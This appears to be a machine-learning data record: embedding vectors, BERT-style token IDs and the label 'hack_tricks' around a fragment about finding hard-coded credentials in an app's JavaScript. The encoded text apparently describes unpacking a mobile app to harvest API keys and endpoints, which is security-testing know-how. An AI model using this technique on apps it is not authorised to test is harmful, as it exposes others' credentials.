0.027556825429201126, -1.0592254400253296, -0.27892398834228516, 0.6028636693954468, 0.011072500608861446, -0.2800147533416748, -0.11120534688234329, -0.5092007517814636, 0.03646478429436684, 0.7016933560371399, -0.3614357113838196, -0.10138483345508575, -0.4506330192089081, 0.24569803476333618, 0.31324735283851624, 0.691643476486206, -0.5406386256217957, -0.506783127784729, -0.13234807550907135, -0.5103102326393127, 0.4884706139564514, 0.8174514174461365, 0.39385852217674255, 0.16899532079696655, -0.5173673033714294, -0.12705190479755402, 0.8176063299179077, -0.38365137577056885, -0.321004182100296, -0.17535899579524994, 0.14052531123161316, 0.18552841246128082, 0.6983380317687988, -0.9351897239685059, 0.4926203787326813, 0.31975212693214417, -0.4274766743183136, 1.2550632953643799, -0.5191342234611511, -0.43401503562927246, -0.16599252820014954, -0.23807527124881744, -0.2927074134349823, 0.8195450901985168, -0.7927903532981873, 0.004534835461527109, -0.9096220135688782, -0.15354804694652557, -0.3688625395298004, -0.5890597105026245, 0.7577059268951416, -0.15506066381931305, 0.07950081676244736, -0.05628892779350281, 0.168683722615242, -0.21752098202705383, 0.48587992787361145, -0.5217429399490356, -1.0587917566299438, 0.7968241572380066, -0.4629417955875397, 0.9585068225860596, 0.12039848417043686, -0.3570346236228943, 0.4495874047279358, -0.6955959796905518, 0.6626763939857483, 0.11436696350574493, 0.03988146036863327, -0.6685212254524231, -0.3691328763961792, -0.1676400750875473, 0.20594722032546997, 0.06915896385908127, 1.1458516120910645, 0.02735785022377968, 0.04223135858774185, -0.4469921886920929, 0.4083658754825592, -0.20436030626296997, -1.1335231065750122, -0.23686835169792175, -0.02461177296936512, 0.24567747116088867, -0.3151954710483551, 0.7053213119506836, -0.269326776266098, -0.4059517979621887, 0.6194042563438416, 0.22601717710494995, 0.5270347595214844, -0.6326135993003845, -0.12268494814634323, -0.1744699776172638, -0.05549130588769913, -0.13742996752262115, 0.3841821253299713, -0.3266097903251648, -0.39996203780174255, 0.1686508059501648, 0.5392032265663147, 0.25258901715278625, -0.27672430872917175, -1.0656070709228516, 0.45477473735809326, -0.33864903450012207, -0.14751753211021423, 0.017334934324026108, 0.06476791203022003, -0.1416132003068924, -0.29399344325065613, 0.3590077757835388, -0.46235743165016174, -1.1229236125946045, -0.7590250968933105, 0.32726120948791504, -0.5563905835151672, 0.2143455296754837, -0.8070619702339172, -0.2678205668926239, -0.2534780502319336, 0.41628196835517883, -0.151816263794899, -0.7203676104545593, -0.028299441561102867, -0.7276075482368469, 0.23584364354610443, -0.04158775880932808, -0.5850605964660645, -0.6971704363822937, -0.6525909900665283, 0.13486520946025848, 0.7728050351142883, -0.5060108304023743, 0.13435740768909454, -0.23124821484088898, 0.21859432756900787, -0.024745536968111992, 0.16578498482704163, -0.8168088793754578, -0.19413919746875763, -0.6028996706008911, -0.21847404539585114, 0.05473612993955612, 0.8683776259422302, -0.6258237361907959, 0.36895909905433655, -0.5710590481758118, -0.07363507151603699, 0.15503044426441193, 0.10155902802944183, 0.051237087696790695, 0.0864267498254776, 0.6873626708984375, -0.1397971361875534, -0.43316650390625, -0.5428394079208374, 0.7093190550804138, 0.06768175214529037, -0.06886651366949081, -0.6416018009185791, 0.0893029123544693, -0.8594257831573486, -1.053093433380127, 0.6961380839347839, -0.21361155807971954, 0.06358037889003754, 0.10431758314371109, -0.20148417353630066, 0.8940770030021667, -0.7648056149482727, -0.27979913353919983, 0.6292592883110046, 1.3514397144317627, 0.764788031578064, -0.7826424837112427, 0.5929273366928101, 0.7201920747756958, -0.37364518642425537, -0.5604723691940308, -0.2244262397289276, 0.49449893832206726, 0.06310229748487473, -0.31638333201408386, -0.24912546575069427, -0.7067790627479553, 0.23811621963977814, 0.360332727432251, -0.05932855233550072, 0.8468544483184814, 0.5876627564430237, -1.3936285972595215, 0.23423805832862854, 0.04067210108041763, 0.563883364200592, -0.013979688286781311, 1.0106583833694458, 0.2235177606344223, 0.6879081130027771, 0.15352211892604828, 0.23910921812057495, 0.3882390856742859, -0.4322197437286377, 0.7878243923187256, 0.07429321110248566, -0.4538689851760864, 0.2822344899177551, 0.5630825161933899, -0.9401615858078003, -0.25769203901290894, -0.7743842601776123, -0.11407915502786636, 0.294505774974823, -0.271150141954422, -0.11759371310472488, -0.08334700763225555, -0.2149110585451126, 0.06920035183429718, 0.28489914536476135, -0.6331378817558289, -0.2353265881538391, -0.4878128468990326, 0.40493401885032654, 0.232663094997406, -0.09086697548627853, 0.44629645347595215, -0.8932850956916809, -0.8064229488372803, -0.9272693991661072, 0.03468161076307297, 0.16680945456027985, -0.10803722590208054, 0.9128366708755493, -0.04109133407473564, 0.6400893330574036, 0.2130163013935089, 0.2886291742324829, 0.7379003167152405, 0.4194183647632599, 0.4894905686378479, 0.6722659468650818, -0.46443191170692444, -1.1000958681106567, -0.9532551765441895, 0.29272955656051636, 0.11116456985473633, 0.6559367179870605, -0.04196404293179512, -0.19627302885055542, -0.18962067365646362, 0.35890766978263855, 0.09446035325527191, -0.5336729884147644, -0.8016826510429382, -0.9672201871871948, -0.09152889251708984, 0.10563352704048157, -0.09453559666872025, -0.3102949559688568, 0.6279090642929077, -0.34451186656951904, -0.3939482569694519, 0.07938180863857269, 0.9786357283592224, -0.42743027210235596, 0.03587432578206062, -0.7998136878013611, 0.5097486972808838, -0.5028532147407532, -0.7625220417976379, -0.7513004541397095, -0.00035033997846767306, 0.2064647078514099, 0.056281618773937225, -0.29003578424453735, -0.020602570846676826, -0.3875868022441864, 0.6200922131538391, -0.6792264580726624, 0.2663559913635254, -0.32305195927619934, -0.3838121294975281, 0.06967875361442566, 0.48298463225364685, -0.6881176829338074, 0.388291597366333, -0.1870276927947998, 0.12103477865457535, -0.3015081584453583, -0.29684627056121826, 0.18920767307281494, -0.1233849823474884, 0.3044736087322235, 0.09013305604457855, -0.14214478433132172, 0.3763958513736725, -0.14566393196582794, 0.36480170488357544, -0.21712158620357513, -0.5282126665115356, -0.6442353129386902, 0.29412466287612915, 0.48572665452957153, 0.3117314577102661, 0.15732450783252716, 1.0624539852142334, 0.4991675913333893, 0.42695796489715576, -0.18284708261489868, 0.5773819088935852, 0.3665885627269745, -0.6747994422912598, 0.4689857065677643, -0.048935163766145706, 0.4701676666736603, -0.40818774700164795, -0.09836723655462265, 0.24050281941890717, -0.4883437752723694, -0.09385736286640167, 0.07639270275831223, -0.09202302992343903, -0.4693053364753723, -0.187423974275589, -0.08541195094585419, -0.019839372485876083, 0.616386353969574, 0.17693541944026947, 0.479195237159729, 0.49501174688339233, -0.4996040165424347, 0.29612186551094055, -0.4327636957168579, -0.6599873900413513, -0.05336904153227806, -0.45719435811042786, -0.1448298990726471, -0.14588940143585205, 0.5133060216903687, 0.2917514741420746, 0.28785520792007446, -0.21093598008155823, 0.13863447308540344, -0.4310561716556549, 0.31776317954063416, 1.0950281620025635, -0.7656627297401428, -0.706319272518158, -0.7606002688407898, 0.9819563627243042, -0.7119746804237366, -0.6947444677352905, 0.43066900968551636, 0.9318423271179199, 0.3695516884326935, -0.7560542225837708, -0.49171340465545654, -0.3582473397254944, 0.14073729515075684, 0.839801549911499, 0.5595229864120483, -0.28128325939178467, -1.1928070783615112, 0.6354191899299622, -0.9182695150375366, 0.3397553265094757, -0.24824659526348114, 0.009967714548110962, 0.24612294137477875, 0.3770681619644165, 0.16570377349853516, 0.510492205619812, 0.4547034502029419, -0.06709744781255722, 0.3722043037414551, -0.0023944941349327564, 0.32417744398117065, -0.22607506811618805, -0.541709840297699, -0.16019409894943237, 0.28533852100372314, 0.35851943492889404, 0.5114647746086121, 0.19990678131580353, 0.10004562884569168, 0.4955824017524719, -0.7106603980064392, -0.31916293501853943, 0.2825111448764801, -0.02250821702182293, 0.4203832447528839, 0.0996929481625557, -0.6074366569519043, -0.23103536665439606, -0.06061632186174393, -0.41908982396125793, 0.3559531569480896, -0.5387094616889954, -0.042282525449991226, 0.26797810196876526, -0.06724465638399124, 0.6419757008552551, -0.7142821550369263, 0.9313499927520752, -0.2061263769865036, 0.21131718158721924, 0.4744570255279541, -0.24111443758010864, -0.8233960866928101, 0.21633751690387726, 0.8248090147972107, 0.0913817435503006, -0.2288907915353775, 1.3232572078704834, -0.5482742190361023, 0.08747667074203491, 0.32401174306869507, 0.0010076812468469143, -0.5413079261779785, -0.32318800687789917, -0.32798561453819275, -0.6961615085601807, -0.6347178220748901, 0.08403937518596649, 0.7653645277023315, -0.6277904510498047, 0.1750609129667282, -0.08875458687543869, 0.08939433097839355, -0.5120310187339783, -0.36886000633239746, 0.17371757328510284, -0.12836498022079468, 0.7197251915931702, -0.8047761917114258, -1.0181392431259155, 0.886186420917511, 0.05433584004640579, 0.4876907765865326, -0.4170509874820709, 0.8271834850311279, 0.009020392782986164, 0.8984928727149963, 0.3168701231479645, -0.5908520817756653, -0.16942258179187775, -0.4059385061264038, -0.10845909267663956, -0.20938852429389954, -0.2362847775220871, -0.5318969488143921, 0.39366093277931213, -0.3559454083442688, -1.0245459079742432, -0.8679399490356445, -0.002016145270317793, -0.5296618342399597, -1.2089450359344482, 0.6254103779792786, -0.034757599234580994, -0.8499947786331177, -0.10759543627500534, 0.6486643552780151, -0.03478621691465378, 0.4168572723865509, -0.6345149278640747, -0.009219648316502571, 0.1012330874800682, -0.551049530506134, -0.3077843189239502, 0.7828564047813416, -0.8519537448883057, -0.6996584534645081, 0.3472341299057007, -0.9168890118598938, -0.7182620167732239, -0.1223100870847702, -0.0573594868183136, -0.7071831226348877, 1.0308853387832642, 0.30546432733535767, 1.0438296794891357, 0.7331932783126831, -0.7775326371192932, 0.1600363701581955, 0.2845412790775299, 0.8645600080490112, 0.05005979537963867, 0.7446310520172119, 0.4686003625392914, -0.12128658592700958, 0.029244376346468925, 0.06311194598674774, 0.6787182688713074, 0.02987523376941681, -0.17471744120121002, -0.5107060074806213, -0.09928972274065018, -0.6274710893630981, -0.4507177472114563, 0.21538829803466797, -0.0798163041472435, 0.22871103882789612, 0.6462478041648865, -1.2827786207199097, 0.04836402088403702, -0.5733288526535034, 0.38286420702934265, -0.3181939423084259, -0.05346030741930008, 0.16423887014389038, -0.003301638877019286, 0.957879364490509, -0.9378902912139893, 4.146334648132324, 0.39787155389785767, 0.03647088631987572, 0.15818944573402405, 0.4297448992729187, 0.6000253558158875, 0.7099806070327759, -0.8901307582855225, 0.4813290238380432, -0.2691076397895813, 0.3799114525318146, -1.0236705541610718, 0.43297079205513, 0.7078614234924316, -0.5252392888069153, 0.3274039030075073, -0.5943366885185242, 0.5737422704696655, 0.11613760888576508, -1.062991976737976, -0.7250146269798279, 0.02078598365187645, 0.2689460515975952, 0.4173784852027893, 0.2962070405483246, 0.40094608068466187, -0.33938246965408325, -0.24956032633781433, 0.002132949884980917, -0.44461628794670105, -0.12392763048410416, -0.12343703955411911, -0.04841604456305504, -0.1929064244031906, -0.36943233013153076, 0.39013826847076416, 0.334384560585022, -0.33618053793907166, -0.1376582831144333, 0.5847066640853882, -0.021877411752939224, -0.5227552652359009, 0.3151150941848755, -0.2894498407840729, 0.4113531708717346, 0.6016424894332886, -0.40909838676452637, 0.25547608733177185, 0.5417379140853882, -0.4738909602165222, 0.9173304438591003, -0.3291129469871521, 0.5532401204109192, 0.19238236546516418, -0.1795346587896347, 0.07026862353086472, -0.31570348143577576, -0.6049442887306213, -0.13385754823684692, -0.4568880498409271, 0.595085084438324, -0.7368103265762329, 0.5282877683639526, 0.06296360492706299, -1.2836912870407104, 0.9653003215789795, -0.5967872738838196, 0.6063670516014099, 0.4418618679046631, -0.10361574590206146, -0.10371503978967667, -0.1736486554145813, -0.8555019497871399, -0.5910466909408569, 0.7095298171043396, 0.11020135879516602, 0.04133263975381851, 0.20470452308654785, 0.15624846518039703, -0.5458024740219116, 0.010780222713947296, -0.12340391427278519, -0.6175809502601624, 0.5050274729728699, 1.2529641389846802, 0.2632768154144287, -0.5069597959518433, -0.9784436821937561, -0.21590237319469452, 0.28046295046806335, 0.6102719902992249, 0.5502688884735107, 0.051062896847724915, -0.3675313889980316, 0.6570073366165161 ]
[ 101, 10509, 3128, 4646, 2378, 14192, 3370, 15826, 2013, 24471, 2140, 3128, 2003, 1037, 4684, 4646, 7705, 2008, 2003, 2087, 4141, 2109, 2000, 4503, 5097, 2005, 11924, 1998, 16380, 2011, 12067, 1996, 2224, 1997, 10509, 1998, 3128, 4132, 9859, 1012, 2122, 2420, 1010, 2009, 1521, 1055, 2468, 6233, 2759, 2000, 2224, 10509, 2408, 7248, 1012, 2021, 2087, 1997, 1996, 2051, 1010, 1996, 4563, 7961, 1997, 1996, 4646, 3658, 1999, 1996, 10509, 3128, 9262, 22483, 2008, 2064, 2022, 4663, 2302, 11303, 2000, 2224, 20647, 2475, 16084, 1012, 3357, 1011, 1015, 1024, 2292, 1521, 1055, 12210, 3251, 1996, 4646, 2001, 2328, 2006, 10509, 3128, 7705, 1012, 2000, 4638, 2023, 1010, 14916, 14074, 1996, 9706, 2243, 2007, 14101, 5331, 1998, 2059, 14817, 1996, 9706, 2243, 2000, 1037, 2047, 19622, 2478, 1996, 2206, 3094, 21906, 4012, 1012, 2742, 1012, 9706, 2243, 2742, 1011, 9706, 2243, 1012, 14101, 4609, 5831, 2361, 1011, 1053, 4160, 2742, 1011, 9706, 2243, 1012, 14101, 1011, 1040, 10509, 19833, 3512, 12618, 9333, 2063, 2000, 1996, 4397, 2580, 10509, 19833, 3512, 19622, 1010, 1998, 2424, 1996, 7045, 19622, 1012, 2503, 2023, 19622, 1010, 2009, 2323, 5383, 5950, 1012, 11924, 1012, 14012, 1012, 2023, 5371, 2097, 5383, 2035, 1997, 1996, 10509, 9262, 22483, 1999, 1037, 1008, 1008, 7163, 10451, 4289, 1012, 1008, 1008, 10509, 3128, 7901, 3330, 16294, 2094, 1012, 1011, 6140, 1064, 24665, 13699, 1011, 1045, 1000, 1012, 14012, 1002, 1000, 3746, 2005, 8466, 2618, 2361, 1011, 1016, 1024, 4526, 1037, 5371, 2315, 5950, 1012, 16129, 1999, 1996, 2168, 14176, 2007, 1996, 2206, 3642, 1999, 2009, 1012, 2017, 2064, 2039, 11066, 1996, 5371, 2000, 24471, 2140, 2030, 10838, 2007, 1996, 2206, 4084, 1024, 1026, 5896, 5034, 2278, 1027, 1000, 1012, 1013, 5950, 1012, 11924, 1012, 14012, 1000, 1028, 1026, 1013, 5896, 1028, 3746, 2005, 2695, 26915, 1996, 5950, 1012, 16129, 5371, 1999, 8224, 18546, 1012, 2330, 2039, 1996, 9722, 6994, 8237, 1006, 3094, 1009, 5724, 1009, 1046, 2005, 9808, 1060, 2030, 2491, 1009, 5670, 1009, 1046, 2005, 3645, 1007, 1010, 1998, 11562, 2006, 1523, 4216, 1524, 1012, 2017, 2323, 2156, 1037, 9262, 22483, 5371, 1010, 3975, 2039, 2046, 19622, 2015, 1998, 6764, 2008, 2191, 2039, 1996, 2364, 14012, 1012, 2065, 2017, 2024, 2583, 2000, 2424, 1037, 5371, 2170, 5950, 1012, 11924, 1012, 14012, 1012, 4949, 1010, 2017, 2097, 2022, 2583, 2000, 17908, 1996, 3120, 3642, 1999, 2019, 4895, 25300, 10451, 4289, 1012, 4949, 6764, 5383, 1996, 3120, 12375, 2008, 4473, 2017, 2000, 4949, 7163, 10451, 8909, 4765, 28295, 1012, 3357, 1011, 1017, 1024, 3945, 2005, 7591, 22496, 1998, 2203, 26521, 2378, 2023, 4403, 1010, 2017, 2031, 2000, 6709, 1996, 7591, 3145, 22104, 2000, 17908, 1996, 9262, 22483, 3642, 1012, 1037, 5418, 2008, 2003, 2759, 2007, 10509, 3128, 5097, 1010, 2003, 1996, 2224, 1997, 1037, 2353, 2283, 2578, 2066, 2107, 2004, 2543, 15058, 1010, 22091, 2015, 1055, 2509, 2326, 2203, 26521, 1010, 2797, 6309, 4385, 1012, 1010, 2076, 2026, 3988, 28667, 2239, 2832, 1010, 1045, 2031, 5159, 1996, 4646, 2478, 1996, 13764, 8649, 12314, 2326, 1012, 2061, 2241, 2006, 2023, 1010, 1045, 2031, 9022, 1037, 5418, 3141, 2000, 2049, 9563, 1012, 14599, 1010, 1045 ]
hack_tricks
422.txt
0
was able to find sensitive hard - coded credentials in the javascript code. image for post [SEP]
[ 0.24014024436473846, -0.45518702268600464, 0.04041442275047302, -0.153694748878479, 0.1389537751674652, -0.5758155584335327, -0.12956278026103973, 0.19814786314964294, 0.0931769609451294, 0.45534372329711914, 0.41100940108299255, -0.019098298624157906, 0.7779842019081116, -0.7247453927993774, -0.7265364527702332, -0.04977623000741005, 0.4834350347518921, 0.654933512210846, -0.4807082414627075, 0.14874082803726196, 0.14748436212539673, -0.5141100883483887, -1.0536537170410156, -0.32782667875289917, -0.2735852301120758, 0.5385763645172119, 0.5039275884628296, -0.2510053217411041, 1.0447098016738892, 1.0375622510910034, -0.9083909392356873, 0.36714401841163635, -0.2555823028087616, -0.34471413493156433, -0.5524454116821289, -1.0367891788482666, 0.9078320860862732, -0.7982824444770813, -0.45287656784057617, -0.4593893885612488, -0.42067083716392517, 0.09868936985731125, -0.024178991094231606, -0.28178611397743225, -1.0970066785812378, -0.0834258496761322, -0.12345747649669647, 0.9324561953544617, -0.014277830719947815, -0.3399725556373596, 0.14209923148155212, 0.8906129598617554, 0.6414716839790344, 0.6299086809158325, -0.25446900725364685, 0.14180822670459747, 0.16972316801548004, -1.146963119506836, -0.41821005940437317, 0.39186891913414, 0.08380365371704102, 0.40907084941864014, 0.876375138759613, -0.5795722603797913, -0.06089618802070618, 0.2621912956237793, 0.39991137385368347, -0.12850743532180786, -0.48096343874931335, 0.25899574160575867, 0.44169268012046814, 0.41527003049850464, -0.40714630484580994, 0.030421322211623192, -0.9098436832427979, 0.1641916185617447, -0.4216627776622772, 0.6872419118881226, -0.2271031141281128, 0.9450427889823914, -0.6380423903465271, 0.63066166639328, 0.3565101623535156, -0.13689398765563965, -0.0992591455578804, 0.030453873798251152, 0.6801075339317322, 0.6964426040649414, 0.45256033539772034, -0.10784938186407089, 0.045562054961919785, 0.8040401935577393, -0.3159600496292114, 0.8226185441017151, -0.07743106782436371, 0.6818857192993164, -0.1253495067358017, 0.3705057203769684, -0.41622984409332275, 0.6990929245948792, 0.1318432241678238, 0.16407357156276703, -0.6316224336624146, 0.599764883518219, 0.3661375641822815, 0.5180511474609375, 0.18897409737110138, 0.3155180811882019, -0.7433556318283081, -0.1956733763217926, 0.03422126919031143, -0.6776701211929321, -0.811059296131134, -0.6204717755317688, -0.29527127742767334, -0.17087547481060028, 0.1802675873041153, 0.5886301398277283, -0.2599012553691864, -0.43592333793640137, 0.8668692111968994, -0.7600399851799011, 0.45145127177238464, -0.1230560690164566, -0.12888203561306, 0.0589480847120285, -0.4484955072402954, 0.8122466802597046, -0.365764319896698, 0.21200475096702576, 0.29631757736206055, 0.0225982666015625, 0.6902536749839783, 0.20010840892791748, 0.16617295145988464, -0.34225040674209595, 0.032153863459825516, 0.05237758159637451, 0.6708185076713562, -1.0990443229675293, -0.4840189814567566, 0.722879946231842, -0.531578004360199, 1.578118085861206, -0.9726221561431885, 0.15773558616638184, -0.2975752353668213, 0.03552212193608284, -0.6938847899436951, -0.3632418215274811, -0.08180972933769226, -0.4375852942466736, -0.16222290694713593, 0.46600401401519775, -0.1625317633152008, 0.40759608149528503, -0.18311387300491333, -0.2529929280281067, 0.3573184013366699, 0.3396398425102234, 0.15456093847751617, 0.965953528881073, -0.31561529636383057, 0.7107250690460205, 0.27495384216308594, 0.16603457927703857, -0.7694481015205383, -0.5977188944816589, 0.4434566795825958, -0.5888522863388062, 0.5484078526496887, 0.5445472002029419, 0.22897711396217346, -0.11410797387361526, 0.4794221520423889, 0.18120400607585907, 0.5026530027389526, 0.23102854192256927, 1.149651050567627, 0.8947497606277466, -0.36976414918899536, -0.02254667691886425, 0.17091917991638184, 0.9414181113243103, -0.6191099882125854, -0.2954653799533844, 0.17391625046730042, 0.07255542278289795, -0.812674880027771, -0.5659170150756836, 0.6413305997848511, 0.07699362188577652, -0.2259085774421692, 0.46700319647789, -0.3093467652797699, 0.21814775466918945, -1.6990387439727783, 0.12447310984134674, -0.12214649468660355, -1.7599841356277466, -0.851361870765686, 0.1257447451353073, -0.219680055975914, 0.48920032382011414, -0.23574426770210266, -0.15313920378684998, 0.7849547266960144, 0.6552038192749023, -0.416957825422287, 0.034137703478336334, 1.1263999938964844, -0.23276656866073608, -0.6981362700462341, -0.7852454781532288, -0.10654597729444504, -0.2857491970062256, -0.5541161298751831, 0.9604611396789551, -0.0013702032156288624, 0.5968440175056458, 0.08255863934755325, 0.7729787230491638, 0.21160836517810822, 0.39995047450065613, 0.059168294072151184, 0.15876275300979614, -0.16699856519699097, 0.10322604328393936, -0.3637585937976837, -0.4001021087169647, -0.16524110734462738, -0.1257687658071518, 0.2224571257829666, 0.603797197341919, 0.15527398884296417, 0.9870201349258423, 0.10990659892559052, 1.018416404724121, 0.5932113528251648, 1.0996840000152588, -0.07842317223548889, -0.022209955379366875, 0.45708125829696655, 0.6069055795669556, 0.455657035112381, -0.21442905068397522, 0.20645499229431152, 0.06312919408082962, 0.054020244628190994, 0.9206448197364807, -0.6176475882530212, 0.8226811289787292, 0.3590673804283142, 0.5095415711402893, -0.9272853136062622, -0.46403318643569946, 0.5433427691459656, 0.41994741559028625, -0.558009147644043, 0.3361645042896271, 0.00012782885460183024, 0.3058508634567261, 0.08826541900634766, 0.05663103237748146, 0.5407893657684326, -0.6787051558494568, 0.5355754494667053, 0.022238483652472496, -0.28979697823524475, -0.866880476474762, -0.4859893023967743, 0.04076727107167244, -1.1519237756729126, -0.21157079935073853, -0.9956880211830139, 0.18086640536785126, 0.6485764980316162, -0.754439651966095, 0.1790328174829483, -0.41886216402053833, 0.049048081040382385, -0.35870569944381714, -0.15254491567611694, 0.4829995334148407, 0.47883981466293335, 0.2209220826625824, -0.384154736995697, 0.10896759480237961, -0.21875326335430145, 0.2731473445892334, -1.1899970769882202, 0.3731432855129242, -0.29841944575309753, -0.0805794894695282, -0.3433924913406372, 0.027477964758872986, 0.09561999142169952, -0.9586005806922913, -0.6629990935325623, -0.7744268178939819, -0.5842596292495728, -0.2774640917778015, -0.22628861665725708, -0.10579098016023636, -0.7642182111740112, 0.083830326795578, 0.2657279968261719, -0.19501134753227234, 0.8473218083381653, 0.9373488426208496, 0.1524127721786499, 0.5823678374290466, 0.6197534203529358, 0.4015222191810608, -1.254572868347168, 1.6565152406692505, 0.2869643568992615, 0.07542265951633453, -0.04215353727340698, -0.26178163290023804, -0.45585310459136963, -0.2960967719554901, -0.18651247024536133, -0.27263331413269043, 0.19443638622760773, 0.4787132441997528, -0.13764141499996185, -1.4146777391433716, 0.042397331446409225, -0.5883392691612244, -0.44493597745895386, -1.1202582120895386, -0.15565401315689087, 0.02010936848819256, -0.30466708540916443, 0.014253618195652962, 0.22669541835784912, 0.0008277982706204057, -0.354278028011322, 0.15479326248168945, 0.3409523367881775, -0.7160429358482361, 0.10900530219078064, -0.1331862211227417, -0.8063740730285645, 0.27915331721305847, 0.2178705930709839, -0.6923997402191162, -0.09010910987854004, -0.8546627759933472, 0.8467264771461487, 0.09389347583055496, -0.058583155274391174, 0.6311023235321045, -0.16196584701538086, 0.9059606194496155, -0.36912187933921814, 0.4087153375148773, 0.732305109500885, 0.3892922103404999, 0.4151420295238495, 0.4290522634983063, 0.03921825811266899, -0.5874810218811035, -0.257222056388855, -1.1895129680633545, -0.520440936088562, -0.011390727013349533, 1.1473755836486816, -0.9971082210540771, 0.26840731501579285, 0.22400334477424622, -0.8159006237983704, 0.5275225043296814, -0.32065078616142273, -0.8460653424263, 0.5994023084640503, -0.23172061145305634, 1.428995132446289, -0.6476616859436035, -0.3851045072078705, -0.06241269409656525, 0.30742374062538147, 1.1427897214889526, -0.36214855313301086, 0.5980772376060486, -0.31634700298309326, -0.5078346133232117, -0.5927054286003113, -0.3084266185760498, -0.5203433036804199, -0.025015728548169136, 0.06457646936178207, -0.06283687055110931, -1.041473388671875, -0.3640488386154175, 0.16491666436195374, 0.1995891034603119, 0.9533824324607849, 0.7749517560005188, 0.002883865498006344, -0.4469108581542969, 0.7444366812705994, 0.7450984120368958, 0.13887880742549896, 0.3094024956226349, -0.471521258354187, 1.0904139280319214, 0.11619818955659866, -0.048590946942567825, -0.14751841127872467, 0.4270387887954712, -0.01153052132576704, 0.4130256772041321, 0.1550600230693817, 0.11790459603071213, -0.07995378971099854, -0.27381113171577454, 0.3137282133102417, 0.4470681846141815, -0.5592870712280273, -0.6701020002365112, -0.25075221061706543, 0.3108929991722107, 0.7988991141319275, -0.9838835597038269, -0.2845233678817749, 0.3774116635322571, -0.11586377024650574, 0.20832490921020508, -0.2579236924648285, -0.9116947650909424, -0.08189424127340317, -0.9652693867683411, -1.0404120683670044, 0.018823785707354546, 0.5337408781051636, -0.2874867916107178, 0.6179465651512146, -0.6999344229698181, 0.8302302956581116, 0.09470026195049286, -0.17512880265712738, -0.1556108146905899, -0.62100750207901, -0.10914616286754608, 0.3212408721446991, 1.0165116786956787, -0.71099853515625, -0.2084084302186966, -0.05676877498626709, -0.7534312009811401, 0.2357405722141266, 0.3480834364891052, -0.5511815547943115, -0.21822018921375275, 0.8934516310691833, -0.4498961567878723, 0.6948933601379395, -0.1809072047472, -0.3723873794078827, 0.28134629130363464, -0.42591428756713867, -0.7743813395500183, -0.7201733589172363, 0.20573130249977112, -0.35051441192626953, 0.0622636154294014, 0.5280091166496277, 0.0942152664065361, -0.21691840887069702, 0.17757466435432434, -0.001697226194664836, -0.862675130367279, 0.19791950285434723, -0.3770922124385834, 0.1692296266555786, 0.2530997097492218, -0.4529094398021698, 0.6132553815841675, -0.7783352136611938, 1.0919671058654785, 0.20430096983909607, -0.6999515891075134, -0.1866651326417923, -0.10686275362968445, 0.5178758502006531, 0.372435986995697, -0.5148546099662781, 0.5800340175628662, 0.009333698078989983, -1.0430755615234375, 0.6744551658630371, -0.42184022068977356, 0.06774777173995972, 0.7548711895942688, -0.49616411328315735, -0.31113705039024353, 0.7582719922065735, -0.09067609906196594, 0.528535783290863, 0.08113650232553482, -1.0988733768463135, 0.450141966342926, -0.2857566177845001, 0.3582843542098999, -0.7290195226669312, -0.3652236759662628, 0.03077612817287445, -0.0473678819835186, -1.0836536884307861, 0.05279748514294624, -0.6981527209281921, -0.05573186278343201, 0.6678393483161926, 0.6964184045791626, 0.9138770699501038, -0.15812568366527557, 0.9049058556556702, 0.4854423701763153, -0.032386116683483124, -1.0871851444244385, -0.06668668240308762, 0.40402287244796753, 0.03193005546927452, 0.2585018575191498, 0.4900199770927429, -0.9821171760559082, -0.5159227252006531, -0.5638474225997925, 0.8097167611122131, -1.003817081451416, -0.4813970923423767, -0.8101295232772827, 0.06080327555537224, -0.3999091684818268, 0.8305062055587769, 0.43200600147247314, -0.575107216835022, -0.32181453704833984, -0.3394649922847748, 0.4798319339752197, -0.3372470736503601, -0.2859339416027069, 0.10987972468137741, -0.6963263750076294, 0.31257954239845276, 1.2406362295150757, -0.40608614683151245, 0.9377851486206055, -0.4604141116142273, 0.673820972442627, 0.4921224117279053, 0.3244646191596985, -1.1426002979278564, -0.5952662229537964, -0.09866924583911896, -0.3866327106952667, -0.11585085839033127, 0.24539095163345337, -1.3162587881088257, 0.5286687612533569, -0.08549398928880692, 0.6105886697769165, -0.35620445013046265, 0.08767221122980118, -0.1984195113182068, 0.2558065354824066, 0.7239753007888794, -1.2642745971679688, -0.0009105858625844121, -0.7341487407684326, 0.44982677698135376, -0.44267866015434265, 0.1796475201845169, 0.5327722430229187, -0.24360543489456177, -1.1762771606445312, -0.8272665143013, 0.4081396460533142, 0.2077840119600296, -0.3148961067199707, 0.5265864133834839, -0.4597104489803314, 0.8751775622367859, -0.7763532400131226, 0.6783431172370911, 0.8773809671401978, 0.3616985082626343, -0.392941951751709, -0.6173688173294067, -0.0347251370549202, 1.0218982696533203, -0.826736330986023, -0.015005779452621937, 0.7424712181091309, -0.9824546575546265, 0.28786417841911316, -0.27234789729118347, 0.556130051612854, -0.6404691338539124, -0.6005666851997375, 0.17430993914604187, -0.27997443079948425, 1.1918368339538574, -0.21951796114444733, -1.51102876663208, -1.0084680318832397, 0.6186453104019165, -0.15539391338825226, 0.18835200369358063, 0.6386738419532776, -0.2434198558330536, 0.4967536926269531, 0.38377225399017334, -0.3451853394508362, 0.3130699694156647, -0.4901162087917328, 0.9916818141937256, -0.3450963795185089, -0.533759355545044, -0.08398369699716568, 0.24527928233146667, -0.34348389506340027, -0.7902902364730835, 0.09583361446857452, -0.06844193488359451, 0.08073053508996964, -0.26930126547813416, 0.21255885064601898, -0.01664363220334053, -0.24816809594631195, -0.0708274394273758, 0.07464627921581268, -0.11695586889982224, 0.505430281162262, -0.3745476305484772, 0.07094921916723251, 0.07293049991130829, -0.556238055229187, 1.3108092546463013, -0.3646107316017151, 0.09229115396738052, -0.38819602131843567, 0.33116790652275085, -0.2196485698223114, 0.5204959511756897, 0.697716236114502, 0.785636842250824, 0.634074866771698, 0.4002518057823181, 0.12486404180526733, 1.7550075054168701, 0.5185749530792236, 0.6950392723083496, 0.4806233048439026, -0.6503043174743652, -0.2824978232383728, -0.4742239713668823, 0.1499210149049759, -0.5439042448997498, -0.1801338791847229, -0.1971869170665741, 0.5279982089996338, 0.43311038613319397, 0.46589845418930054, 0.23415225744247437, -0.7541324496269226, 0.13495147228240967, -1.3149633407592773, -0.3079887330532074, -0.12048669159412384, -0.1864989697933197, -0.6100596785545349, -0.35500019788742065, -0.49046966433525085, 0.11714828759431839, -0.7565799355506897, 0.25852829217910767, -0.8699712157249451, -0.42420366406440735, -0.7264404296875, -0.18079635500907898, -0.250836044549942, -1.0165205001831055, -0.5527291893959045, -0.515895426273346, 0.20358802378177643, -0.15082579851150513, 